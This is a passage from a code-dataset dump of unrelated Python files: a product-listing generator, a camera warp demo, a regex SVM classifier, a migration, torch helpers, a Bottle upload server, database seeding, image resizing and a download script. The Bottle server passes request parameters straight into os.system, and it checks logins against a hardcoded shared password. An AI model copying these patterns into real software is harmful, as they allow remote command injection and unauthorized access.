item_images.items():\n if len(v) == 0:\n unavailable_image_variations.append(k)\n else:\n available_image_variations.append(k)\n\n if (\n len(available_image_variations) == 1\n and local\n and available_image_variations[0]\n not in [\"black-gold\", \"sterling-silver\", \"platinum\"]\n ) or (\n local\n and len(unavailable_image_variations) > 1\n and \"black-gold\" in unavailable_image_variations\n ):\n result = \", \".join(unavailable_image_variations)\n no_image.append(f\"sku: {item.sku} - {result}\")\n else:\n successfull_items += 1\n overstock_combined_data = {}\n amazon_combined_data = {}\n \"\"\"converting class object to required data dictionary\"\"\"\n required_data = vars(item)\n stones_info = item.item_stones\n \"\"\"adding required data dictionary to static data dictionary\"\"\"\n amazon_combined_data.update(amazon_sta_data)\n amazon_combined_data.update(required_data)\n overstock_combined_data.update(overstock_sta_data)\n overstock_combined_data.update(required_data)\n amazon_item_data = subconstructor_amazon.data_generator(\n item,\n amazon_combined_data,\n amazon_colnames,\n amazon_image_cells,\n item_images,\n decoration_data,\n stones_info,\n )\n overstock_item_data = subconstructor_overstock.data_generator(\n item,\n overstock_combined_data,\n overstock_colnames,\n overstock_main_image_cells,\n overstock_option_image_cells,\n item_images,\n decoration_data,\n stones_info,\n )\n amazon_output_data.extend(amazon_item_data)\n overstock_output_data.extend(overstock_item_data)\n # category = item.subclass\n if count == items_qty:\n suffix = \"\".join(\n filename.rsplit(\"/\", 1)[-1]\n .split(\"-\")[-1]\n .split(\".\")[0]\n .split(\" \")\n )\n out_filename = f\"{ovs_folder}/{suffix}.xlsx\"\n work_with_excel.printing(\n overstock_output_data, filename, out_filename, pagename,\n )\n\n previous_filename = filename\n previous_pagename = pagename\n\n return {\n \"amazon_data\": amazon_output_data,\n \"no_images\": no_image,\n \"successfull_items_qty\": successfull_items,\n }\n","sub_path":"app/constructors/constructor.py","file_name":"constructor.py","file_ext":"py","file_size_in_byte":5987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"390976995","text":"#!/usr/bin/env python3\n\n'''\nThis example shows usage 
of ImageWarp to crop a rotated rectangle area on a frame,\nor perform various image transforms: rotate, mirror, flip, perspective transform.\n'''\n\nimport depthai as dai\nimport cv2\nimport numpy as np\n\nkey_rotate_decr = 'z'\nkey_rotate_incr = 'x'\nkey_resize_inc = 'v'\nkey_warp_test_cycle = 'c'\n\ndef print_controls():\n print(\"=== Controls:\")\n print(key_rotate_decr, \"-rotated rectangle crop, decrease rate\")\n print(key_rotate_incr, \"-rotated rectangle crop, increase rate\")\n print(key_warp_test_cycle, \"-warp 4-point transform, cycle through modes\")\n print(key_resize_inc, \"-resize cropped region, or disable resize\")\n print(\"h -print controls (help)\")\n\nrotate_rate_max = 5.0\nrotate_rate_inc = 0.1\n\nresize_max_w = 800\nresize_max_h = 600\nresize_factor_max = 5\n\n'''\nThe crop points are specified in clockwise order,\nwith first point mapped to output top-left, as:\n P0 -> P1\n ^ v\n P3 <- P2\n'''\nP0 = [0, 0] # top-left\nP1 = [1, 0] # top-right\nP2 = [1, 1] # bottom-right\nP3 = [0, 1] # bottom-left\nwarp_test_list = [\n # points order, normalized cordinates, description\n #[[[0,0],[1,0],[1,1],[0,1]], True, \"passthrough\"],\n #[[[0,0],[639,0],[639,479],[0,479]], False, \"passthrough (pixels)\"],\n [[P0, P1, P2, P3], True, \"1.passthrough\"],\n [[P3, P0, P1, P2], True, \"2.rotate 90\"],\n [[P2, P3, P0, P1], True, \"3.rotate 180\"],\n [[P1, P2, P3, P0], True, \"4.rotate 270\"],\n [[P1, P0, P3, P2], True, \"5.horizontal mirror\"],\n [[P3, P2, P1, P0], True, \"6.vertical flip\"],\n [[[-0.1,-0.1],[1.1,-0.1],[1.1,1.1],[-0.1,1.1]], True, \"7.add black borders\"],\n [[[-0.3, 0],[1, 0],[1.3, 1],[0, 1]], True, \"8.parallelogram transform\"],\n [[[-0.2, 0],[1.8, 0],[1, 1],[0, 1]], True, \"9.trapezoid transform\"],\n]\n\npipeline = dai.Pipeline()\n\ncam = pipeline.createColorCamera()\ncam.setPreviewSize(640, 480)\ncam.setInterleaved(False)\ncam_out = pipeline.createXLinkOut()\ncam_out.setStreamName(\"preview\")\n\nmanip = pipeline.createImageManip()\nmanip.setMaxOutputFrameSize(2000*1500*3)\nmanip_out = pipeline.createXLinkOut()\nmanip_out.setStreamName(\"manip\")\nmanip_cfg = pipeline.createXLinkIn()\nmanip_cfg.setStreamName(\"manip_cfg\")\n\ncam.preview.link(cam_out.input)\ncam.preview.link(manip.inputImage)\nmanip.out.link(manip_out.input)\nmanip_cfg.out.link(manip.inputConfig)\n\nwith dai.Device(pipeline) as device:\n device.startPipeline()\n\n q_preview = device.getOutputQueue(name=\"preview\", maxSize=4)\n q_manip = device.getOutputQueue(name=\"manip\", maxSize=4)\n q_manip_cfg = device.getInputQueue(name=\"manip_cfg\")\n\n key = -1\n angle_deg = 0\n rotate_rate = 1.0\n resize_factor = 0\n resize_x = 0\n resize_y = 0\n test_four_pt = False\n warp_idx = -1\n\n print_controls()\n\n while key != ord('q'):\n if key > 0:\n if key == ord(key_rotate_decr) or key == ord(key_rotate_incr):\n if key == ord(key_rotate_decr):\n if rotate_rate > -rotate_rate_max: rotate_rate -= rotate_rate_inc\n if key == ord(key_rotate_incr):\n if rotate_rate < rotate_rate_max: rotate_rate += rotate_rate_inc\n test_four_pt = False\n print(\"Crop rotated rectangle, rate per frame: {:.1f} degrees.\"\n .format(rotate_rate))\n elif key == ord(key_resize_inc):\n resize_factor += 1\n if resize_factor > resize_factor_max:\n resize_factor = 0\n print(\"Crop region not resized\")\n else:\n resize_x = resize_max_w // resize_factor\n resize_y = resize_max_h // resize_factor\n print(\"Crop region resized to\", resize_x, 'x', resize_y)\n elif key == ord(key_warp_test_cycle):\n # Disable resizing initially\n 
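# The 4-point warps listed in warp_test_list above can be prototyped on the
# host with plain OpenCV before they are sent to the device. A minimal sketch
# under that assumption: `frame` is any BGR image, `points_norm` is one of the
# normalized quads (first point maps to the output top-left, clockwise), and
# warp_four_points is an illustrative helper, not part of the example itself.
import cv2
import numpy as np

def warp_four_points(frame, points_norm):
    h, w = frame.shape[:2]
    # scale the normalized quad to pixels; it is the source quadrilateral
    src = np.float32([[x * w, y * h] for x, y in points_norm])
    # the quad is mapped onto the corners of the full output rectangle
    dst = np.float32([[0, 0], [w, 0], [w, h], [0, h]])
    matrix = cv2.getPerspectiveTransform(src, dst)
    return cv2.warpPerspective(frame, matrix, (w, h))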
resize_factor = 0\n warp_idx = (warp_idx + 1) % len(warp_test_list)\n test_four_pt = True\n test_description = warp_test_list[warp_idx][2]\n print(\"Warp 4-point transform:\", test_description)\n elif key == ord('h'):\n print_controls()\n\n # Send an updated config with continuous rotate, or after a key press\n if key >= 0 or (not test_four_pt and abs(rotate_rate) > 0.0001):\n cfg = dai.ImageManipConfig()\n if test_four_pt:\n test = warp_test_list[warp_idx]\n points, normalized = test[0], test[1]\n # TODO: improve this, should avoid this conversion\n point2f_list = []\n for p in points:\n pt = dai.Point2f()\n pt.x, pt.y = p[0], p[1]\n point2f_list.append(pt)\n cfg.setWarpTransformFourPoints(point2f_list, normalized)\n else:\n angle_deg += rotate_rate\n rotated_rect = ((320, 240), (400, 400), angle_deg)\n rr = dai.RotatedRect()\n rr.center.x, rr.center.y = rotated_rect[0]\n rr.size.width, rr.size.height = rotated_rect[1]\n rr.angle = rotated_rect[2]\n cfg.setCropRotatedRect(rr, False)\n if resize_factor > 0:\n cfg.setResize(resize_x, resize_y)\n #cfg.setWarpBorderFillColor(0, 0, 255)\n #cfg.setWarpBorderReplicatePixels()\n q_manip_cfg.send(cfg)\n\n for q in [q_preview, q_manip]:\n pkt = q.get()\n name = q.getName()\n shape = (3, pkt.getHeight(), pkt.getWidth())\n frame = pkt.getData().reshape(shape).transpose(1, 2, 0)\n frame = np.ascontiguousarray(frame)\n if name == \"preview\" and not test_four_pt:\n # Draw RotatedRect cropped area on input frame\n points = np.int0(cv2.boxPoints(rotated_rect))\n cv2.drawContours(frame, [points], 0, (255,0,0), 1)\n # Mark top-left corner\n cv2.circle(frame, tuple(points[1]), 10, (255,0,0), 2)\n cv2.imshow(name, frame)\n key = cv2.waitKey(1)\n","sub_path":"examples/20_color_rotate_warp.py","file_name":"20_color_rotate_warp.py","file_ext":"py","file_size_in_byte":6171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"265155983","text":"import numpy as np\nfrom .base_classifier import BaseClassifier\nfrom util.string_functions import split_string_into_sentences\nfrom sklearn import svm\n# from sklearn.neighbors import KNeighborsClassifier\n# from sklearn import linear_model\nfrom .classifier_helpers import get_matches_all_sentences\n\nclass SVMRegexClassifier(BaseClassifier):\n '''\n Class specialized in classifying patient data using regexes\n '''\n def __init__(self, classifier_name, regexes, data=None, labels=None, ids=None, normalize=True):\n '''\n Initializes RegexClassifier\n\n :param classifier_name: Name of classifier\n :param regexes: List of Regex objects\n :param data: List of data\n :param labels: List of labels\n :param ids: List of ids\n '''\n super().__init__(classifier_name=classifier_name, data=data, labels=labels, ids=ids)\n self.regexes = regexes\n\n self._regex_list = []\n [self._regex_list.extend(l) for l in regexes.values()]\n\n self.normalize = normalize\n self.classifier = svm.SVC(kernel='linear', C=1, class_weight='balanced')\n\n def simple_freq_count_text(self, text, regexes, regex_to_freq_dict):\n '''\n Given a text, regexes and regex.name -> dict, it determines the amount of times regex.name appears in the text\n\n :param text: A string of text\n :param regexes: A list of regex objects\n :param regex_to_freq_dict: A string -> frequency dictionary i.e The regex's name to its count\n\n '''\n for regex in regexes:\n regex_matches = regex.determine_matches(text)\n regex_to_freq_dict[regex.name] += len(regex_matches)\n\n def freq_count_sentence(self, text, regexes, 
regex_to_freq_dict, freq_func=None):\n '''\n Given a text, regexes, regex.name and freq_func, it determines the amount of times regex.name appears in text\n using freq_func\n\n :param text: A string of text\n :param regexes: A list of regex objects\n :param regex_to_freq_dict: A string -> frequency dictionary i.e The regex's name to its count\n :param freq_func: function for calculating frequency\n '''\n func = self.simple_freq_count_text if freq_func is None else freq_func\n func(text, regexes, regex_to_freq_dict)\n\n def freq_count_sentences(self, text, regexes, regex_to_freq_dict, freq_func=None):\n '''\n Given a text, regexes, regex.name and freq_func, it determines the amount of times regex.name appears in text\n using freq_func\n\n :param text: A string of text\n :param regexes: A list of regex objects\n :param regex_to_freq_dict: A string -> frequency dictionary i.e The regex's name to its count\n :param freq_func: function for calculating frequency\n '''\n sentences = split_string_into_sentences(text)\n for sentence in sentences:\n self.freq_count_sentence(sentence, regexes, regex_to_freq_dict, freq_func)\n\n def calculate_frequency(self, dataset_name, normalize=True):\n '''\n Given a dataset_name, creates a frequency matrix where each row corresponds to the regex frequences for a single datapoint\n :param dataset_name: String dataset_name. (Note self.dataset[dataset_name] must be initialized first)\n :param normalize: If true, the frequencies are normalized to create a probability distribution else they are just counts\n\n :return: A nxk frequency matrix where n is the number of datapoints and k is the number of regexes\n '''\n data = self.dataset[dataset_name][\"data\"]\n labels = self.dataset[dataset_name][\"labels\"]\n ids = self.dataset[dataset_name][\"ids\"]\n\n svm_data = np.array([[]])\n\n for id, datum, label in zip(ids, data, labels):\n regexes_to_freq = {regex.name: 0 for regex in self._regex_list}\n self.freq_count_sentences(datum, self._regex_list, regexes_to_freq)\n\n total_val = 1\n\n if normalize:\n total_val = sum(regexes_to_freq.values()) if sum(regexes_to_freq.values()) > 0 else 1\n\n frequencies = np.array([[regexes_to_freq[regex.name]/total_val for regex in self._regex_list]])\n\n if svm_data.shape[1] == 0:\n svm_data = frequencies\n else:\n svm_data = np.concatenate((svm_data, frequencies), axis=0)\n\n self.dataset[dataset_name][\"regex_frequencies\"] = svm_data\n\n return svm_data\n\n def train_classifier(self, **classifier_params):\n '''\n Trains SVMRegexClassifier's classifier\n '''\n\n data = self.calculate_frequency(\"train\", normalize=self.normalize)\n x, y = data, self.dataset[\"train\"][\"labels\"]\n self.classifier.set_params(**classifier_params)\n self.classifier.fit(x, y)\n\n def run_classifier(self, sets=[\"train\", \"valid\"]):\n '''\n Runs the trained classifier on the given datasets. 
Note these must be loaded into self.dataset object first\n        or initialized in some other manner\n\n        :param sets: A list of dataset names to run the classifier on\n        '''\n\n        print(\"\\nRunning Classifier:\", self.name)\n\n        for data_set in sets:\n            print(\"Running classifier on {} with {} datapoints\".format(data_set, len(self.dataset[data_set][\"labels\"])))\n\n            svm_data = self.calculate_frequency(data_set, normalize=self.normalize)\n            preds = self.classifier.predict(svm_data)\n            self.dataset[data_set][\"preds\"] = preds\n\n            self.dataset[data_set][\"matches\"] = []\n            self.dataset[data_set][\"scores\"] = []\n\n            for datum in self.dataset[data_set][\"data\"]:\n                class_matches = {}\n                class_scores = {}\n                sentences = split_string_into_sentences(datum)\n                for class_name in self.regexes:\n                    matches = get_matches_all_sentences(sentences, self.regexes[class_name])\n\n                    class_scores[class_name] = None\n                    class_matches[class_name] = matches\n\n                self.dataset[data_set][\"matches\"].append(class_matches)\n                self.dataset[data_set][\"scores\"].append(class_scores)\n","sub_path":"RegexNLP-py/classifier/svm_regex_classifier.py","file_name":"svm_regex_classifier.py","file_ext":"py","file_size_in_byte":6217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"234576167","text":"\"\"\"empty message\n\nRevision ID: a2a8506228b6\nRevises: 2d14cbf595f1\nCreate Date: 2021-04-23 10:45:34.683207\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = 'a2a8506228b6'\ndown_revision = '2d14cbf595f1'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.create_table('delivery_parish',\n    sa.Column('parish', sa.String(length=45), nullable=False),\n    sa.Column('delivery_rate', sa.Numeric(precision=10, scale=2), nullable=False),\n    sa.PrimaryKeyConstraint('parish')\n    )\n    op.create_table('taxes',\n    sa.Column('tax', sa.String(length=50), nullable=False),\n    sa.Column('rate', sa.Numeric(precision=10, scale=2), nullable=False),\n    sa.PrimaryKeyConstraint('tax')\n    )\n    op.create_table('taxes_on_goods',\n    sa.Column('tax', sa.String(), nullable=False),\n    sa.Column('grocery_id', sa.Integer(), nullable=False),\n    sa.ForeignKeyConstraint(['grocery_id'], ['grocery.id'], ),\n    sa.ForeignKeyConstraint(['tax'], ['taxes.tax'], ),\n    sa.PrimaryKeyConstraint('tax', 'grocery_id')\n    )\n    op.add_column('grocery', sa.Column('grams_per_unit', sa.Numeric(precision=10, scale=2), nullable=False))\n    op.add_column('orders', sa.Column('deliverydate', sa.DateTime(), nullable=True))\n    op.add_column('orders', sa.Column('deliveryparish', sa.String(length=45), nullable=True))\n    op.add_column('orders', sa.Column('deliverytown', sa.String(length=45), nullable=True))\n    op.create_foreign_key('fk_orders_deliveryparish', 'orders', 'delivery_parish', ['deliveryparish'], ['parish'])\n    # drop the old camelCase columns that the lowercase columns above replace\n    op.drop_column('orders', 'deliveryParish')\n    op.drop_column('orders', 'deliveryDate')\n    op.drop_column('orders', 'deliveryTown')\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.add_column('orders', sa.Column('deliveryTown', sa.VARCHAR(length=45), server_default=sa.text('NULL::character varying'), autoincrement=False, nullable=True))\n    op.add_column('orders', sa.Column('deliveryDate', postgresql.TIMESTAMP(), autoincrement=False, nullable=True))\n    op.add_column('orders', sa.Column('deliveryParish', sa.VARCHAR(length=45), server_default=sa.text('NULL::character varying'), autoincrement=False, nullable=True))\n    op.drop_constraint('fk_orders_deliveryparish', 'orders', type_='foreignkey')\n    op.drop_column('orders', 'deliverytown')\n    op.drop_column('orders', 'deliveryparish')\n    op.drop_column('orders', 'deliverydate')\n    op.drop_column('grocery', 'grams_per_unit')\n    op.drop_table('taxes_on_goods')\n    op.drop_table('taxes')\n    op.drop_table('delivery_parish')\n    # ### end Alembic commands ###\n","sub_path":"migrations/versions/a2a8506228b6_.py","file_name":"a2a8506228b6_.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"250855574","text":"__author__ = 'piotr.blaszczyk82@gmail.com'\nimport unittest\n\n\nclass TestRandomGenerator(unittest.TestCase):\n    def test_init_2(self):\n        \"\"\"\n        Smoke test: create the tables if needed and insert a sample user\n        \"\"\"\n        # Given...\n        from shortening.service.models import db, User, Logs, Shortening\n        from peewee import IntegrityError\n\n        db.connect()\n        if not User.table_exists():\n            User.create_table()\n        if not Logs.table_exists():\n            Logs.create_table()\n        if not Shortening.table_exists():\n            Shortening.create_table()\n\n        User.proxy = 1\n\n        try:\n            u = User(login='user1', password='pass1')\n            u.save()\n        except IntegrityError:\n            print(\"User already exists\")\n\n        users = User.select()\n        for user in users:\n            print('> %s' % (str(user),))\n\n        db.close()\n        # When, Then...\n\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"tests/unit/test_db_proxy.py","file_name":"test_db_proxy.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"618379423","text":"#! 
/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Copyright 2018 Kyoto University (Hirofumi Inaguma)\n#  Apache 2.0  (http://www.apache.org/licenses/LICENSE-2.0)\n\n\"\"\"Utility functions.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport torch\n\n\ndef tensor2np(x):\n    \"\"\"Convert tensor to np.ndarray.\n\n    Args:\n        x (FloatTensor):\n    Returns:\n        np.ndarray\n\n    \"\"\"\n    return x.cpu().numpy()\n\n\ndef np2tensor(array, device_id=-1):\n    \"\"\"Convert from np.ndarray to Tensor.\n\n    Args:\n        array (np.ndarray): A tensor of any size\n        device_id (int): the index of the device\n    Returns:\n        var (Tensor):\n\n    \"\"\"\n    # assert isinstance(array, np.ndarray)\n    # var = torch.from_numpy(array).pin_memory())\n    var = torch.from_numpy(array)\n    if device_id < 0:\n        return var\n    # return var.cuda(device_id, async=True)\n    return var.cuda(device_id)\n\n\ndef pad_list(xs, pad_value=0.0, pad_left=False):\n    \"\"\"Convert list of Tensors to a single Tensor with padding.\n\n    Args:\n        xs (list): A list of length `[B]`, which contains Tensors of size `[T, input_size]`\n        pad_value (float):\n        pad_left (bool):\n    Returns:\n        xs_pad (FloatTensor): `[B, T, input_size]`\n\n    \"\"\"\n    bs = len(xs)\n    max_time = max(x.size(0) for x in xs)\n    xs_pad = xs[0].new_zeros(bs, max_time, * xs[0].size()[1:]).fill_(pad_value)\n    for b in range(bs):\n        if len(xs[b]) == 0:\n            continue\n\n        if pad_left:\n            xs_pad[b, -xs[b].size(0):] = xs[b]\n        else:\n            xs_pad[b, :xs[b].size(0)] = xs[b]\n    return xs_pad\n\n\ndef compute_accuracy(logits, ys_ref, pad):\n    \"\"\"Compute accuracy.\n    Args:\n        logits (FloatTensor): `[B, T, vocab]`\n        ys_ref (LongTensor): `[B, T]`\n        pad (int): index for padding\n    Returns:\n        acc (float): teacher-forcing accuracy\n    \"\"\"\n    pad_pred = logits.view(ys_ref.size(0), ys_ref.size(1), logits.size(-1)).argmax(2)\n    mask = ys_ref != pad\n    numerator = torch.sum(pad_pred.masked_select(mask) == ys_ref.masked_select(mask))\n    denominator = torch.sum(mask)\n    acc = float(numerator) * 100 / float(denominator)\n    return acc\n\n\ndef to_onehot(ys, vocab, ylens=None):\n    \"\"\"\n    Args:\n        ys (LongTensor): Indices of labels. 
`[B, L]`\n        ylens (list): A list of length `[B]`\n    Returns:\n        ys_onehot (LongTensor): `[B, L, vocab]`\n\n    \"\"\"\n    bs, max_ylen = ys.size()[:2]\n\n    # an expanded view of zeros_like(ys) shares storage and cannot be written\n    # element-wise; allocate a real [B, L, vocab] tensor instead\n    ys_onehot = ys.new_zeros(ys.size(0), ys.size(1), vocab)\n    for b in range(bs):\n        if ylens is None:\n            for t in range(max_ylen):\n                ys_onehot[b, t, ys[b, t]] = 1\n        else:\n            for t in range(ylens[b]):\n                ys_onehot[b, t, ys[b, t]] = 1\n    return ys_onehot\n","sub_path":"neural_sp/models/torch_utils.py","file_name":"torch_utils.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"34793279","text":"import os, socket, bottle\nfrom bottle import route, request, static_file, run\nfrom beaker.middleware import SessionMiddleware\nsession_opts = {\n'session.type': 'file',\n'session.cookie_expires': 300,\n'session.data_dir': './data',\n'session.auto': True\n}\n\napp = SessionMiddleware(bottle.app(), session_opts)\n\n\n@route('/')\ndef root():\n    return static_file('test.html', root='.')\n    \n@route('/login', method='POST')\ndef do_login():\n    \n    account = request.params.get('account')\n    password = request.params.get('password')\n    print (account)\n    if account in ('admin','upfly','ivy','kuo','dale','sam','tim','huang','hao') and password == '70808' :\n        print (\"login ok\")\n        return '1'\n    return '0'\n\n\n@route('/upload', method='POST')\ndef do_upload():\n    global globvarName\n    global save_imgpath\n    save_path = 'UserData_upload/'\n    save_imgpath = save_path\n    if not os.path.exists(save_path):\n        os.makedirs(save_path)\n    upload = request.files.get('Accelerometer')\n    template = request.params.get('TemplateIndex')\n    exe_str = 'SignalAnalysis.exe \"'+save_path+str(upload.filename)+\"\\\" \"+template\n    ##exe_str = '\"C:\\Users\\\\70808\\Documents\\Visual Studio 2013\\Projects\\SignalAnalysis\\SignalAnalysis\\SignalAnalysis.exe\" '+str(upload.filename)+\" \"+template\n    ##exe_str = '\"C:\\Users\\70808\\Desktop\\SignalAnalysis\\SignalAnalysis.exe\" '+str(upload.filename)+\" \"+template\n    ##exe_str ='''D:\\SignalAnalysis.exe '''+'RecordByadminAt16_36_57.csv'+ ' '+ template\n    print (exe_str)\n    name, ext = os.path.splitext(upload.filename)\n    \n    globvarName = name\n    # ('.csv') without a comma is just a string, not a one-element tuple\n    if ext not in ('.csv',):\n        return \"File extension not allowed.\"\n    \n    ##save_path = \"C:\\Users\\\\70808\\Documents\\Visual Studio 2013\\Projects\\SignalAnalysis\\SignalAnalysis\"\n\n    file_path = \"{path}/{file}\".format(path=save_path, file=upload.filename)\n    upload.save(file_path)\n    result = os.system(exe_str)\n    print (result)\n    return str(result)\n    #return \"File successfully saved to '{0}'.\".format(save_path)\n\n    \n@route('/image', method='GET')\ndef do_returnImage():\n    ##img_file = \"{filename}.{type}\".format(filename=globvarName, type=\"png\")\n    print (globvarName)\n    return static_file(save_imgpath+globvarName + '.png', root='.')\n\n","sub_path":"DTW_WSGI.py","file_name":"DTW_WSGI.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"322255344","text":"import sqlite3\nimport random\n\n\nDB_PATH = 'db.sqlite3'\n\n\ndef init():\n    connection = sqlite3.connect(DB_PATH)\n    cursor = connection.cursor()\n\n    cursor.executescript(open('shema.sql', 'r').read())\n    connection.commit()\n    connection.close()\n\n\ncountries = [\n    \"Russia\",\n    \"England\",\n    \"Italy\",\n    \"Germany\",\n    \"Spain\",\n    \"Portugal\",\n    \"Denmark\",\n    \"Iceland\",\n    \"Mexico\"\n]\n\ncities = {\n    \"Russia\": [\"Moscow\", \"SP\", \"Krasnodar\"],\n    \"England\": [\"London\", \"Manchester\"],\n    
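# The INSERT statements that make_data() below builds with an f-string are
# injection-prone and break on quotes in the data. sqlite3 supports parameter
# binding, which avoids both; a sketch (insert_match is an illustrative
# helper, not part of the original script):
import sqlite3

def insert_match(connection, row_id, match):
    # match is the 6-tuple produced by next_match()
    connection.execute(
        "INSERT INTO matches VALUES (?, ?, ?, ?, ?, ?, ?)",
        (row_id, *match),
    )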
\"Italy\": [\"Rome\", \"Milan\"],\n \"Germany\": [\"Berlin\", \"Frankfurt\"],\n \"Spain\": [\"Barcelona\", \"Madrid\"],\n \"Portugal\": [\"Lisbon\"],\n \"Denmark\": [\"Copenhagen\"],\n \"Iceland\": [\"Reykjavik\"],\n \"Mexico\": [\"Mexico\"]\n}\n\n\ndef next_match():\n if True:\n team1 = random.choice(countries)\n while True:\n team2 = random.choice(countries)\n if team1 != team2:\n break\n country = random.choice(countries)\n city = random.choice(cities[country])\n score1 = random.randint(0, 5)\n score2 = random.randint(0, 5)\n return team1, team2, country, city, score1, score2\n\n\ndef make_data():\n connection = sqlite3.connect(DB_PATH)\n c = connection.cursor()\n for i in range(1000):\n match = next_match()\n cmd = f\"\"\"\n INSERT INTO matches VALUES(\n {i},\n \"{match[0]}\",\n \"{match[1]}\",\n \"{match[2]}\",\n \"{match[3]}\",\n \"{match[4]}\",\n \"{match[5]}\"\n );\n \"\"\"\n c.execute(cmd)\n connection.commit()\n connection.close()\n\n\ndef check_table():\n connection = sqlite3.connect(DB_PATH)\n c = connection.cursor()\n cmd = \"SELECT * FROM matches\"\n c.execute(cmd)\n r = c.fetchall()\n for i in r:\n print(i)\n\n connection.close()\n\n\nif __name__ == \"__main__\":\n init()\n make_data()\n check_table()\n","sub_path":"Projects/FlaskREST/Day1/db_init.py","file_name":"db_init.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"506213977","text":"import os\nfrom PIL import Image\n\n\n# directory = r\"C:\\Users\\MrD\\Desktop\\Şehit Fatih Gökkaya TOVAK\"\ndirectory = input(\"Klasör yolu giriniz:\\n\")\nnew_directory = os.path.join(directory,\"resized\")\nfiles = os.listdir(directory)\nif not os.path.exists(new_directory):\n os.mkdir(new_directory)\n\nimg_no = 1\nfor file in files:\n f_name, e = os.path.splitext(file)\n new_name = \"new_\" + f_name + \".jpg\"\n try:\n f_path = os.path.join(directory,file)\n fn_path = os.path.join(new_directory,new_name)\n im = Image.open(f_path)\n width = im.size[0]\n height = im.size[1]\n\n if width > height:\n n_width = int(float(width)*(80000/width)/100)\n n_height = int(float(height)*(60000/height)/100)\n else:\n n_width = int(float(height)*(60000/height)/100)\n n_height = int(float(width)*(80000/width)/100)\n\n # print(n_width,n_height)\n img = im.resize((n_width,n_height),resample=0) \n img.save(fn_path)\n print(img_no, \"dosya başarıyla yeniden boyutlandırıldı.\")\n img_no+=1\n except IOError:\n if os.path.isfile(f_path):\n print(\"File cannot be saved.\",)","sub_path":"PillowTutorial/tut4_resize.py","file_name":"tut4_resize.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"151995814","text":"#!/usr/bin/python3.5\n# Downloads links in the 'links' file. Updates the links file so that\n# completed links are removed from the file and places completed links\n# in a seperate file just in case they are needed again.\n\n# IMPORTS\nimport os\nimport time\nimport argparse\n\n# ARGUMENT PARSER\nparser = argparse.ArgumentParser(\n\tdescription=\"A tool to download several HTTP links provided in a file.\")\nparser.add_argument(\n\t\"-s\",\n\t\"--shutdown\",\n\thelp=\"Shut the system down after downloading has completed. (use sudo)\",\n\taction=\"store_true\")\nparser.add_argument(\n\t\"-f\",\n\t\"--file\",\n\thelp=\"-The links file to work with. 
Leave blank to use default (.links)\",\n\tnargs=\"?\",\n\tdefault=\".links\")\nargs = parser.parse_args()\nlinksList = args.file\nshutAfter = args.shutdown\n\n\n# GLOBAL VARIABLES\nlinksFile = \"\"\nlinks = []\ncompletedLinks = []\n\n# READ THE LINKS FILE\ndef readLinks():\n\tglobal linksList\n\tlinksFile = open(linksList, \"r\")\n\tfor line in linksFile:\n\t\tlinks.append(line.rstrip(\"\\n\"))\n\tlinksFile.close()\n\n# UPDATE THE LINKS FILE\ndef writeLinks():\n\tglobal linksList\n\tlinksFile = open(linksList, \"w+\")\n\tfor link in links:\n\t\tlinksFile.write(\"{}\\n\".format(link))\n\tlinksFile.close()\n\n# WRITE LINKS TO THE COMPLETED LINKS FILE\ndef writeComplete(curLink):\n\tcompleteFile = open(\".complete\", \"a\")\n\tcompleteFile.write(\"{}\\n\".format(curLink))\n\tcompleteFile.close()\n\n# WRITE MESSAGES TO THE LOG FILE\ndef writeLog(logMsg):\n\tlocalTime = time.asctime(time.localtime(time.time()))\n\tmsg = \"[{}] {}\\n\".format(localTime, logMsg)\n\tlogFile = open(\".log\", \"a\")\n\tlogFile.write(msg)\n\tlogFile.close()\n\n# THE MAIN FUNCTION OF THE PROGRAM\ndef downloadLinks():\n\treadLinks()\n\tfileNum = 0\n\tfor i in range(0, len(links)):\n\t\twriteLog(\"Starting link: {}\".format(links[fileNum]))\n\t\tosres = os.system(\"aria2c --load-cookies=.cookie -x 5 -s 5 -k 50M -c {}\".format(links[fileNum]))\n#\t\tosres = os.system(\"aria2c -x 5 -s 5 -k 20M -c --http-user=EMAILADDRESSHERE --http-passwd=PASSWORD {}\".format(links[fileNum]))\n\t\tif osres == 0:\n\t\t\twriteLog(\"Completed link: {}\".format(links[fileNum]))\n\t\t\twriteComplete(links[fileNum])\n\t\t\tlinks.pop(fileNum)\n\t\t\twriteLinks()\n\t\telse:\n\t\t\twriteLog(\"Error, returned {}\".format(osres))\n\t\t\twriteLog(\"Error downloading {}\".format(links[fileNum]))\n\t\t\tfileNum += 1\n\n# Start the main function of the program\ndownloadLinks()\n\n# Shutdown the system when complete\nif shutAfter: \n\tos.system(\"shutdown -h\")\n","sub_path":"downloadLinks.py","file_name":"downloadLinks.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"202016303","text":"import pytorch_lightning as pl\nimport torch\nfrom 